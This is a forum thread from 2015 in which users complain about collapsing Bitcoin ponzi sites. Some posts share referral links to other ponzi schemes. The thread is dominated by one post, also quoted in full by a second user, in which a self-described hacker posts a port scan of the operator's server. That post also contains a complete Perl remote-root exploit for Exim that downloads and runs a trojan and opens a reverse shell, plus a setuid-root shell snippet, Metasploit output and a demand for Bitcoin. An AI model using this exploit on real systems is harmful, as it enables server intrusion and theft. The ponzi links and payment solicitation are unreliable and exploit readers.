winspiral
Legendary
Offline
Activity: 1778
Merit: 1026
Free WSPU2 Token or real dollars
|
|
May 03, 2015, 07:02:38 AM |
|
Registration Date: Apr-16-2015 Last Access: May-2-2015 04:09:15 PM Account Balance: ฿0.00000556 ฿0.00000556 of BitCoin Earned Total: ฿0.00050795 Pending Withdrawal: ฿0.00017000 Withdrew Total: ฿0.00018000 Active Deposit: ฿0.00065238 Last Deposit: ฿0.00065238 Apr-23-2015 05:24:25 AM Total Deposit: ฿0.00065238 Last Withdrawal: ฿0.00018000 Apr-28-2015 06:50:56 AM Withdrew Total: ฿0.00018000
The problem is:I waited to long before I invested...with ponzi never wait too long...each second counts.
|
|
|
|
XperiaZ4
Member
Offline
Activity: 96
Merit: 10
|
|
May 03, 2015, 10:53:01 AM |
|
See my signature. Hourly profit program and instant withdraw.
|
|
|
|
tzementa
Newbie
Offline
Activity: 10
Merit: 0
|
|
May 03, 2015, 12:49:35 PM |
|
From my previous experience (on 5 diff occasions). Whenever withdrawals suddenly start 'pending', when they used to be instant. That means the outgoing funds are now > incoming funds, and the ponzi can't sustain, and the site will collapse imminently In other words, usually it means game over
Hope I'm wrong this time
Same here but luckily on 4 occasions, (surely the rest will follow anytimes) , i invested everywhere seeming "legit" like 120btc, earndaily, bitc-i24, 14daily.. well sometimes it works but there's still some hope mr. speedy comes back after a four days weekend, and fixes it. but https://www.aprilcoin.com/?ref=larson and https://earntomorrow.com/?ref=larson are still paying (for long!) its at ours to keep it running and to indirectly support the scam we scream about afterwards
|
|
|
|
|
|
SoccerStar
Newbie
Offline
Activity: 14
Merit: 0
|
|
May 03, 2015, 02:24:41 PM |
|
He has whois guard, any other ways to get his ip?
|
|
|
|
SoccerStar
Newbie
Offline
Activity: 14
Merit: 0
|
|
May 03, 2015, 02:33:33 PM |
|
He has whois guard, any other ways to get his ip?
I may have to ask administrators? no. I found something what might be interested!
|
|
|
|
baristor137
Member
Offline
Activity: 64
Merit: 10
|
|
May 03, 2015, 08:31:36 PM |
|
I love u guys ! if u can hack him maybe u can help me get my money back
|
|
|
|
apitico
|
|
May 03, 2015, 09:42:16 PM |
|
That would be beautiful, even if i don't have my money back, at least it would be a dream come true if it would't end in the hands of this scammers, because we all knew that some day they were going to stop paying, but when that day comes they also should stop accepting investments, thats dirty game.
|
|
|
|
|
apitico
|
|
May 03, 2015, 11:36:31 PM |
|
For a while.....i kind of think you where for real
|
|
|
|
gecox22
|
|
May 04, 2015, 02:04:13 AM |
|
OK I am so lost now. What's going on?
|
|
|
|
andolini82
|
|
May 04, 2015, 10:26:41 PM |
|
100% scam rite? No one can hack they wallet? Lol
|
|
|
|
5m4ru1
Newbie
Offline
Activity: 59
Merit: 0
|
|
May 05, 2015, 02:27:40 AM |
|
hehe i told u dont fucking play with me ! where is u "ponzi" now ? some infos to public http://pastebin.com/VGcARfGeORT STATE SERVICE VERSION 21/tcp open ftp Pure-FTPd 22/tcp open ssh OpenSSH 5.3 (protocol 2.0) 26/tcp closed rsftp 53/tcp open tcpwrapped 80/tcp open http nginx 110/tcp open pop3 Dovecot pop3d 143/tcp open imap Dovecot imapd 443/tcp open http nginx 465/tcp open ssl/smtp Exim smtpd 4.85 993/tcp open ssl/imap Dovecot imapd 995/tcp open ssl/pop3 Dovecot pop3d 3306/tcp open mysql MySQL (unauthorized) 8080/tcp closed http-proxy nice 465/tcp open ssl/smtp Exim smtpd 4.85 code of exploit in perl: #Exim 4.85 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope #Modified perl version of metasploit module
=for comment
use this connect back shell as "trojanurl" and be sure to setup a netcat,
---snip---
$system = '/bin/sh'; $ARGC=@ARGV; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET");
open FILE, ">/var/spool/exim4/s.c"; print FILE qq{ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { setuid(0); setgid(0); setgroups(0, NULL); execl("/bin/sh", "sh", NULL); } }; close FILE;
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c"); open FILE, ">/tmp/e.conf"; print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}"; close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf"); system("uname -a;"); system("/var/spool/exim4/s"); system($system);
---snip---
=cut
use IO::Socket;
if ($#ARGV ne 3) { print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n"; print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n"; exit; }
$|=1;
$trojan = $ARGV[1]; $myip = $ARGV[2]; $myport = $ARGV[3]; $helohost = "abcde.com";
$max_msg = 52428800;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "25", Proto => 'tcp');
while(<$sock>) { print; if ($_ =~ /220 /) { last;} }
print $sock "EHLO $helohost\r\n"; while(<$sock>) { print; if ($_ =~ /250-SIZE (\d+)/) { $max_msg = $1; print "Set size to $max_msg !\n"; } if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) { $revdns = $1; $saddr = $2; } if ($_ =~ /250 /) { last;} }
if ($revdns eq $helohost) { $vv = ""; } else { $vv = $revdns. " "; }
$vv .= "(" . $helohost . ")";
$from = "root\@local.com"; $to = "postmaster\@localhost";
$msg_len = $max_msg + 1024*256; $logbuffer_size = 8192;
$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n"; $logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";
$filler = "V" x (8 * 16); $logbuffer_size -= 3;
for ($k=0;$k<60;$k++) { if (length($logbuffer) >= $logbuffer_size) {last;} $hdr = sprintf("Header%04d: %s\n", $k, $filler); $newlen = length($logbuffer) + length($hdr); if ($newlen > $logbuffer_size) { $newlen -= $logbuffer_size; $off = length($hdr) - $newlen - 2 - 1; $hdr = substr($hdr, 0, $off); $hdr .= "\n"; } $hdrs .= $hdr; $logbuffer .= " " . $hdr; }
$hdrx = "HeaderX: "; $k2 = 3; for ($k=1;$k<=200;$k++) { if ($k2 > 12) { $k2 = 3; } # $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} "; $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} "; $k2++; }
$v = "A" x 255 . "\n"; $body = ""; while (length($body) < $msg_len) { $body .= $v; }
$body = substr($body, 0, $msg_len);
print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n"; $v = <$sock>; print $v; print $sock "DATA\r\n"; $v = <$sock>; print $v;
print "Sending large buffer, please wait...\n";
print $sock $hdrs; print $sock $hdrx . "\n"; print $sock $body; print $sock "\r\n.\r\n"; $v = <$sock>; print $v; print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n";
while(1){}; msf core... root@kali:~# msfconsole [*] Starting the Metasploit Framework console...\ ######## # ################# # ###################### # ######################### # ############################ ############################## ############################### ############################### ############################## # ######## # ## ### #### ## ### ### #### ### #### ########## #### ####################### #### #################### #### ################## #### ############ ## ######## ### ######### ##### ############ ###### ######## ######### ##### ######## ### ######### ###### ############ ####################### # # ### # # ## ######################## ## ## ## ## http://metasploit.pro
Easy phishing: Set up email templates, landing pages and listeners in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]] + -- --=[ 1389 exploits - 788 auxiliary - 223 post ] + -- --=[ 356 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search Exim [!] Database not connected or cache not built, using slow search
Matching Modules ================
Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/linux/smtp/exim4_dovecot_exec 2015-01-03 excellent Exim and Dovecot Insecure Configuration Command Injection exploit/unix/smtp/exim4_string_format 2013-12-07 excellent Exim4 string_format Function Heap Buffer Overflow
msf > some screenshot http://s21.postimg.org/jrb4prl6f/Screenshot_from_2015_05_05_23_29_37.pngsome problem if u have i cant windraw all here admin@money10.netadmin@14daily.comadmin@bitcoinfield.netadmin@profit12.comadmin@lucrebit.comwellcome speedy1987 in me worlddont sarching me i have 20 firewole 10 nat and 5 vps hahah. now u all cant windraw u monet but if u dont have skills... this is public adres BTC:112QrMgXdaYdSS3n2NnnNWris8feJuQvBk i cant windraw u all people money just put here 0.5 btc ist promotion ! now i go to sleep good night all !pozdrowienia ! polish elite hacker team
|
|
|
|
Tlee88
|
|
May 05, 2015, 05:54:16 AM |
|
hehe i told u dont fucking play with me ! where is u "ponzi" now ? some infos to public http://pastebin.com/VGcARfGeORT STATE SERVICE VERSION 21/tcp open ftp Pure-FTPd 22/tcp open ssh OpenSSH 5.3 (protocol 2.0) 26/tcp closed rsftp 53/tcp open tcpwrapped 80/tcp open http nginx 110/tcp open pop3 Dovecot pop3d 143/tcp open imap Dovecot imapd 443/tcp open http nginx 465/tcp open ssl/smtp Exim smtpd 4.85 993/tcp open ssl/imap Dovecot imapd 995/tcp open ssl/pop3 Dovecot pop3d 3306/tcp open mysql MySQL (unauthorized) 8080/tcp closed http-proxy nice 465/tcp open ssl/smtp Exim smtpd 4.85 code of exploit in perl: #Exim 4.85 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope #Modified perl version of metasploit module
=for comment
use this connect back shell as "trojanurl" and be sure to setup a netcat,
---snip---
$system = '/bin/sh'; $ARGC=@ARGV; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET");
open FILE, ">/var/spool/exim4/s.c"; print FILE qq{ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { setuid(0); setgid(0); setgroups(0, NULL); execl("/bin/sh", "sh", NULL); } }; close FILE;
system("gcc /var/spool/exim4/s.c -o /var/spool/exim4/s; rm /var/spool/exim4/s.c"); open FILE, ">/tmp/e.conf"; print FILE "spool_directory = \${run{/bin/chown root:root /var/spool/exim4/s}}\${run{/bin/chmod 4755 /var/spool/exim4/s}}"; close FILE;
system("exim -C/tmp/e.conf -q; rm /tmp/e.conf"); system("uname -a;"); system("/var/spool/exim4/s"); system($system);
---snip---
=cut
use IO::Socket;
if ($#ARGV ne 3) { print "./eximxpl <host/ip> <trojanurl> <yourip> <yourport>\n"; print "example: ./eximxpl utoronto.edu http://www.h4x.net/shell.txt 3.1.33.7 443\n"; exit; }
$|=1;
$trojan = $ARGV[1]; $myip = $ARGV[2]; $myport = $ARGV[3]; $helohost = "abcde.com";
$max_msg = 52428800;
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "25", Proto => 'tcp');
while(<$sock>) { print; if ($_ =~ /220 /) { last;} }
print $sock "EHLO $helohost\r\n"; while(<$sock>) { print; if ($_ =~ /250-SIZE (\d+)/) { $max_msg = $1; print "Set size to $max_msg !\n"; } if ($_ =~ /^250.*Hello ([^\s]+) \[([^\]]+)\]/) { $revdns = $1; $saddr = $2; } if ($_ =~ /250 /) { last;} }
if ($revdns eq $helohost) { $vv = ""; } else { $vv = $revdns. " "; }
$vv .= "(" . $helohost . ")";
$from = "root\@local.com"; $to = "postmaster\@localhost";
$msg_len = $max_msg + 1024*256; $logbuffer_size = 8192;
$logbuffer = "YYYY-MM-DD HH:MM:SS XXXXXX-YYYYYY-ZZ rejected from <$from> H=$vv [$saddr]: message too big: read=$msg_len max=$max_msg\n"; $logbuffer .= "Envelope-from: <$from>\nEnvelope-to: <$to>\n";
$filler = "V" x (8 * 16); $logbuffer_size -= 3;
for ($k=0;$k<60;$k++) { if (length($logbuffer) >= $logbuffer_size) {last;} $hdr = sprintf("Header%04d: %s\n", $k, $filler); $newlen = length($logbuffer) + length($hdr); if ($newlen > $logbuffer_size) { $newlen -= $logbuffer_size; $off = length($hdr) - $newlen - 2 - 1; $hdr = substr($hdr, 0, $off); $hdr .= "\n"; } $hdrs .= $hdr; $logbuffer .= " " . $hdr; }
$hdrx = "HeaderX: "; $k2 = 3; for ($k=1;$k<=200;$k++) { if ($k2 > 12) { $k2 = 3; } # $hdrx .= "\${run{/bin/sh -c 'exec /bin/sh -i <&$k2 >&0 2>&0'}} "; $hdrx .= "\${run{/bin/sh -c \"exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'\"}} "; $k2++; }
$v = "A" x 255 . "\n"; $body = ""; while (length($body) < $msg_len) { $body .= $v; }
$body = substr($body, 0, $msg_len);
print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n"; $v = <$sock>; print $v; print $sock "DATA\r\n"; $v = <$sock>; print $v;
print "Sending large buffer, please wait...\n";
print $sock $hdrs; print $sock $hdrx . "\n"; print $sock $body; print $sock "\r\n.\r\n"; $v = <$sock>; print $v; print $sock "MAIL FROM: <$from>\r\n"; $v = <$sock>; print $v; print $sock "RCPT TO: <$to>\r\n";
while(1){}; msf core... root@kali:~# msfconsole [*] Starting the Metasploit Framework console...\ ######## # ################# # ###################### # ######################### # ############################ ############################## ############################### ############################### ############################## # ######## # ## ### #### ## ### ### #### ### #### ########## #### ####################### #### #################### #### ################## #### ############ ## ######## ### ######### ##### ############ ###### ######## ######### ##### ######## ### ######### ###### ############ ####################### # # ### # # ## ######################## ## ## ## ## http://metasploit.pro
Easy phishing: Set up email templates, landing pages and listeners in Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.11.0-2015013101 [core:4.11.0.pre.2015013101 api:1.0.0]] + -- --=[ 1389 exploits - 788 auxiliary - 223 post ] + -- --=[ 356 payloads - 37 encoders - 8 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search Exim [!] Database not connected or cache not built, using slow search
Matching Modules ================
Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/linux/smtp/exim4_dovecot_exec 2015-01-03 excellent Exim and Dovecot Insecure Configuration Command Injection exploit/unix/smtp/exim4_string_format 2013-12-07 excellent Exim4 string_format Function Heap Buffer Overflow
msf > some screenshot some problem if u have i cant windraw all here admin@money10.netadmin@14daily.comadmin@bitcoinfield.netadmin@profit12.comadmin@lucrebit.comwellcome speedy1987 in me worlddont sarching me i have 20 firewole 10 nat and 5 vps hahah. now u all cant windraw u monet but if u dont have skills... this is public adres BTC:112QrMgXdaYdSS3n2NnnNWris8feJuQvBk i cant windraw u all people money just put here 0.5 btc ist promotion ! now i go to sleep good night all !pozdrowienia ! polish elite hacker team awesome
|
|
|
|
EarnBtcFaucet
Member
Offline
Activity: 84
Merit: 10
|
|
May 05, 2015, 05:59:08 AM |
|
Nice work man, u got all his personal info.
So who has the money now? If the "hacker" it has i hope he will refund everyone. And take .5 or 1 btc for hisself. Anyways, this is lol.
Scammer gets hacked! Yolo
|
|
|
|
fullypak
Legendary
Offline
Activity: 1456
Merit: 1005
|
|
May 05, 2015, 06:23:22 AM |
|
My loss is not much in this bitcoinfield.net but still there is loss. But my loss is more in the below two sites
clclc.net freegetbitcoin.com/
These two sites didn't even pay couple of days for the users. The run with our money.
|
|
|
|
|